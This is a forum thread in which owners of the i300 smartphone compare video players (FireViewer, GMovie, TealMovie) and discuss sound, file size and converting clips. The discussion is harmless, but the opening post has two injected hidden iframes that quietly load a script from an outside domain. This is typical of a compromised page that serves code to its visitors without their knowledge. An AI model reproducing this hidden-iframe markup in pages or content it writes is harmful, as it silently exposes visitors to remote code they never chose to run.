+ Reply to Thread
    i300 Member

Exclamation video clips on the i300...

hey guys,
    i have fireviewer on my i300 and was just wondering if,

a) this was the best program to use to view videos...and
    b) where i can find video clips to hotsync onto my i300?

thanks.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

smartphonecentral.com

Gmovie

Try GMovie. I've been using it for about a week and am very, very impressed:

http://www.genericmedia.com/products/gm_player.html

--Jesse

Administrator

Re: Gmovie

ive used FV on the 6035 and the i300 and i like it alot. have not tried g movie though.

smartphonecentral.com
    GMovie is movies with sound, unlike Fireviewer. I read that GMovie's authors, GenericMedia, includes one of the guys who originally did QuickTime for Apple. GMovieMaker requires QuickTime to do the conversions. I converted over two movies and they appeared worked perfectly at up to 15fps.

One thing I noticed: Even at high volume, the sound output is quiet and tinny. It certainly doesn't appear to be using the same speaker as the speakerphone, or perhaps has its volume limited. Do we have two speakers inside the i300, one for the PDA and one for the phone, and is the PDA unable to use the phone's speaker? It just seems like the speakerphone can boom while the Palm can only whimper.

--Jesse

Administrator

Arrow

yeah you cant have any sound with FV, but g movie sounds good! il try it!

our phones have a piezo speaker for the palm and a "mini-me" woofer for the phone. not sure which g movies uses, but it may be the phjones speaker... id have to hear the sound it produces to be for sure.. each speaker delivers a different output.. if its "tinny" as you say , then it could be from the piezo...

but some sound is better than no sound...

I am using TealMovie right now.... but am off to try out GMovie..... sounds like there is a mac encoder...

Brooks

How long are these clips you're viewing on the I300?

smartphonecentral.com
    The demo limits encoding to 20 second clips. I had Apple's Oliver Stone commercial and ESPN's Little Penny and Gheorge Muresan commercial both on the device. They were about 2mb total, not really compressed down too tightly.

The encoder gives FPS and sound quality options, which obviously effect file size. With proper settings, and a stripped-down i300, one might be able cram a couple of minutes of video on their phone. Maybe a movie trailer, short music video, their kids & dog, CPR emergency procedures, etc.

--Jesse

Administrator

Arrow

i tried to dl a movie trailer formt he sony site (3MB) and realized i had only 16% memory left!!!! what??? come to find out its from all of those blasted games i HAD on it..

gmovie looks good but without getting the movie maker, therre is limited stuff out there... with FV i csan covert my pics or mpeg stuff into it with the free FV suite...

good looking out who_The!!

the tealmovie maker took a clip I had down to 900k....... the Gmovie maker didn't compress it much at all.... it was 1.7MB..... so much for Gmovie....

Brooks

smartphonecentral.com
    Brooks, are you using the latest version of TealMovie, v2.20? It claims to offer better sound on the Clie devices, including using the headphone jack? I was wondering on the off chance that TealMovie might be able to access the phone speaker (and headset jack) on the i300 now, whereas GMovie apparently can't (sound is quiet and, as Marctronixx speculates, is likely coming from the piezo speaker rather than the phone speaker).

Just wundrin'.

--Jesse

i300 Member
    hey guys...thanks for the replies...i tried gMovie and i have the player on my palm. however, i was unsure how to convert video into the gMovie format. i'm thinking you have to pay for that feature? well, if that's the case, is there somewhere i can download video already converted into gMovie format (whatever that file extension is...) please let me know the details on gMovie.

Administrator

Arrow

yes you have to pay to be abel to comvert..

the only sites are on the link for gmovie... give them a look...